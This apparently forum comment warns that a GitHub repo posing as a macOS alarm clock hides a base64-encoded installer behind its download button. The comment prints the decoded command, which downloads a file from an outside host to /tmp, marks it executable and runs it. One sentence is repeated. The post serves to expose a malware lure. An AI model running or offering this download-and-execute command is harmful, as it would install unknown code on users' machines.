Also this git repo[1] that pretend to be an open source MacOS alarm clock dose the same trick. There is no code in git repo. But if you click the "Get Awaken" red button. It has some base64 encoded string which translate to:
The certificate is self-signed. Have not looked into it much, in today's using `curl bashscript` way of installing program exposed another door for attacker to target no tech savvy users.
https://buildnetcrew.com/curl/e16f01ec9c3f30bc1c4cf56a7109be...' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch
The certificate is self-signed. Have not looked into it much, in today's using `curl bashscript` way of installing program exposed another door for attacker to target no tech savvy users.
[1]: https://github.com/Awaken-Mac/Awaken